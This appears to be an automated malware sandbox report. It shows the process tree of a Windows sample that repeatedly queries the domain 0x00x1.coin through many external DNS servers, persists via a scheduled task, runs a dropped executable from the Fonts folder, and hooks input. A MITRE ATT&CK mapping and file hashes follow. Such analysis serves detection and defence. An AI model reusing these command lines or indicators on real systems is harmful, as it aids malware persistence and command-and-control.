C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 161.97.219.843⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 163.172.168.1712⤵
- System Location Discovery: System Language Discovery
PID:1824 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 163.172.168.1713⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 94.103.153.1762⤵PID:1812
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 94.103.153.1763⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 207.192.71.132⤵PID:1268
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 207.192.71.133⤵PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 178.63.116.1522⤵
- System Location Discovery: System Language Discovery
PID:1084 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 178.63.116.1523⤵
- System Location Discovery: System Language Discovery
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 51.77.227.842⤵
- System Location Discovery: System Language Discovery
PID:1808 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 51.77.227.843⤵
- System Location Discovery: System Language Discovery
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 188.226.146.1362⤵
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 188.226.146.1363⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 51.75.173.1772⤵
- System Location Discovery: System Language Discovery
PID:2592 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 51.75.173.1773⤵
- System Location Discovery: System Language Discovery
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 79.124.7.812⤵PID:2916
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 79.124.7.813⤵PID:600
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 144.76.103.1432⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 144.76.103.1433⤵PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 5.132.191.1042⤵
- System Location Discovery: System Language Discovery
PID:1624 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 5.132.191.1043⤵PID:784
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 13.239.157.1772⤵PID:2960
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 13.239.157.1773⤵PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 207.148.83.2412⤵
- System Location Discovery: System Language Discovery
PID:2872 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 207.148.83.2413⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 165.227.40.432⤵PID:2636
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 165.227.40.433⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.204.1112⤵
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 142.4.204.1113⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.205.472⤵PID:1152
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 142.4.205.473⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 198.100.148.2242⤵
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 198.100.148.2243⤵
- System Location Discovery: System Language Discovery
PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 159.203.38.1752⤵PID:1716
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 159.203.38.1753⤵
- System Location Discovery: System Language Discovery
PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 66.70.228.1642⤵PID:2656
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 66.70.228.1643⤵
- System Location Discovery: System Language Discovery
PID:3036
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:448
-
C:\Windows\system32\taskeng.exetaskeng.exe {64393723-97F0-48EF-A3BC-C7C9DAFF9136} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2944
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:3008
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1772 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:812
-
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:912
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2560 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2148
-
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bcvnbib.exe2⤵PID:1772
-
C:\Windows\Fonts\bcvnbib.exeC:\Windows\Fonts\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2184 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:812
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1Clear Persistence
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD533332120861d18fbd17fee1025af56dd
SHA1132a3a34c2178a1d6ea110e904ba81dfc7765b6f
SHA2567776bb0e5a62e12498d89cf7f34ef2d1fad3ccef52cbb9d5c62ef492f4e3873d
SHA512ff9aab8f465d060315e998ec0738998506c065f24c3361777bd5b2c7f0fcbe913eb14a71f1ceae30e986bd68989dbdefe00aed9129347cc9435b0c712941e5b1
-
Filesize
69KB
MD5e564dc14ddb5b9c5e1661339b1daed09
SHA1c951eda553db0d816fc79765937112f66976f8d5
SHA2563d06ca12e9d6e3effe5fcbb87ebd16d4e978b9657374e3d0fb3c81725d415a98
SHA51237e69238a07ae617aff72719c15b1503e6c2a94c8fbacc4ca28ebd0d083d93815fd66af83147692ea3449256a5c86a1137d763cff6f21617e8ca80eeb4d91d2e
-
Filesize
9.8MB
MD56879a4a51ba8139ea622957a72cc02d5
SHA1ac77337f7502e485a54e81b45d2739a09f57ccb4
SHA25627e05be591e64de79ad345b88dc76f534adafd279901ba098f9cb5006aa6ade1
SHA5128afb6826456ef7f5976fdb67748cab8c05ed98a1dd9f9604b414ef3f5d1098235a1c305cc5aa566f7a2f65f47dd9d57e2f3da8e3ee3618b846f3fd906667a07b